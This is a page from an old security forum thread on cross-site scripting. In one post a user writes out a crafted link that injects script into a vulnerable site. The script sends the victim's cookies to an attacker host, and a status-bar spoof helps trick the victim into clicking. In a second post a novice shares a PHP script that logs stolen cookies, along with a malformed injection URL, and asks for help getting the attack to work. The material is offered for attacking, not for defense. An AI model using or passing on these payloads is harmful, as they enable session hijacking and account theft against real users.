|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 48
Members: 0
Total: 48
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
Posted: Mon Apr 18, 2005 3:36 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
here the real scenario
server - victim - attacker
- server with vulnerable to XSS : <script>alert(document.cookie)</script>
- victim who access the URL that already poisoning with cookiesstealing URL (with social engginering)
for example :
<a href="http://server.com/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>" onMouseOver="window.status='http://www.securityyou.com/2002/SHOWBIZ/talkshow.reut/index.html';return true"onMouseOut="window.status='';return true"> Check this out!</a>
then when user click Check this Out link
they will redirect to attacker site with http://attacker.com/steal.cgi |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
h?llo |
|
Posted: Tue Jun 28, 2005 4:19 pm |
|
|
rsaman |
Beginner |
|
|
Joined: Jun 28, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
HELLO ALL
I have got a question !
What this message means ????
i haven't got access on cookies ???
Quote: | Server Error in '/mps_id_sharing' Application.
--------------------------------------------------------------------------------
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration> |
it's correct or not ????
i use this scrypt ( tuto.php ) ===>
Quote: | <?php
$test = $_GET['cookie'];
echo "cookie --> $test\n";
$fp = fopen('logger.txt','a'); // open to append
if(!$fp)
{
die('f**ck, can't open file to write!');
}
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?> |
for ex : my target is ===>http://www.host.com/index.php
my site is ===>http://www/mysite.com/myname/tuto.php
and i use this URL ????? ===>
i dont know if it write or wrong :s
Quote: | <script>http://www.host.com/index.php/http://myftp/me/tuto.php?cookie='+document.cookie;</Script> |
Can you help me please !!!! sorry for my bad english and for your help because I'm novice !!!!
thank's a lot |
|
_________________ Hello i´m french |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|